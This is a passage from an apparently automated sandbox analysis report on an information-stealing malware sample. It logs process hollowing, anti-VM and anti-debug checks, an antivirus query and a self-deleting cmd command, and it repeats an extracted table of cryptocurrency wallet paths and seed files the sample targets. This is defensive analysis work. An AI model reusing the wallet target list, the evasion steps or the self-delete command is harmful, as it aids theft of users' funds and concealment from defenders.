                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\sqlt[1].dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpAPI coverage: 3.1 %
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp TID: 2372Thread sleep time: -300000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp TID: 2372Thread sleep time: -60000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\timeout.exe TID: 2848Thread sleep count: 90 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                      Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000824000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareA
                      Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000824000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D732C8E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_1D732C8E
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D7346A6 GetProcessHeap,2_2_1D7346A6
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D732C8E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_1D732C8E
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D7342AF SetUnhandledExceptionFilter,2_2_1D7342AF

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: Yara matchFile source: Process Memory Space: 82xul16VKj.exe PID: 2112, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\82xul16VKj.exeMemory allocated: C:\Users\user\AppData\Local\Temp\kat2B07.tmp base: 400000 protect: page execute and read and writeJump to behavior
                      Source: C:\Users\user\Desktop\82xul16VKj.exeCode function: 0_2_02EEBEF0 NtAllocateVirtualMemory,GetTempFileNameA,CreateFileA,WriteFile,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,0_2_02EEBEF0
                      Source: C:\Users\user\Desktop\82xul16VKj.exeMemory written: C:\Users\user\AppData\Local\Temp\kat2B07.tmp base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\Desktop\82xul16VKj.exeSection unmapped: C:\Users\user\AppData\Local\Temp\kat2B07.tmp base address: 400000Jump to behavior
                      Source: C:\Users\user\Desktop\82xul16VKj.exeMemory written: C:\Users\user\AppData\Local\Temp\kat2B07.tmp base: 400000Jump to behavior
                      Source: C:\Users\user\Desktop\82xul16VKj.exeMemory written: C:\Users\user\AppData\Local\Temp\kat2B07.tmp base: 401000Jump to behavior
                      Source: C:\Users\user\Desktop\82xul16VKj.exeMemory written: C:\Users\user\AppData\Local\Temp\kat2B07.tmp base: 425000Jump to behavior
                      Source: C:\Users\user\Desktop\82xul16VKj.exeMemory written: C:\Users\user\AppData\Local\Temp\kat2B07.tmp base: 42E000Jump to behavior
                      Source: C:\Users\user\Desktop\82xul16VKj.exeMemory written: C:\Users\user\AppData\Local\Temp\kat2B07.tmp base: 643000Jump to behavior
                      Source: C:\Users\user\Desktop\82xul16VKj.exeProcess created: C:\Users\user\AppData\Local\Temp\kat2B07.tmp C:\Users\user\AppData\Local\Temp\kat2B07.tmpJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\kat2B07.tmp" & rd /s /q "C:\ProgramData\GHDAAKJEGCFC" & exitJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: GetLocaleInfoW,2_2_1D732112
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: GetLocaleInfoW,2_2_1D732112
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: EnumSystemLocalesW,2_2_1D90FF17
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: GetACP,IsValidCodePage,GetLocaleInfoW,2_2_1D73298C
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D73433C GetSystemTimeAsFileTime,2_2_1D73433C
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpCode function: 2_2_1D914D7C GetTimeZoneInformation,2_2_1D914D7C
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmpWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 00000000.00000002.342512838.0000000002EEB000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0.2.82xul16VKj.exe.3080000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.82xul16VKj.exe.3080000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.82xul16VKj.exe.2eb7719.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.82xul16VKj.exe.2eb7719.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.82xul16VKj.exe.2a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.82xul16VKj.exe.2a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.342253005.00000000002A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.342560030.0000000003080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.342512838.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 82xul16VKj.exe PID: 2112, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: kat2B07.tmp PID: 204, type: MEMORYSTR
                      Source: kat2B07.tmp, 00000002.00000002.425497863.00000000009B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: kat2B07.tmp, 00000002.00000002.425312567.0000000000439000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: um-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: kat2B07.tmp, 00000002.00000002.425497863.00000000009B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: kat2B07.tmp, 00000002.00000002.425312567.0000000000439000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: um-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: kat2B07.tmp, 00000002.00000002.425312567.0000000000439000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: um-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: kat2B07.tmp, 00000002.00000002.425312567.0000000000439000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: um-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: kat2B07.tmp, 00000002.00000002.425312567.0000000000439000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: um-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: kat2B07.tmp, 00000002.00000002.425497863.00000000009B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: kat2B07.tmp, 00000002.00000002.425312567.0000000000439000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: um-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: kat2B07.tmp, 00000002.00000002.425497863.00000000009B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: kat2B07.tmp, 00000002.00000002.425312567.0000000000439000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: um-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia 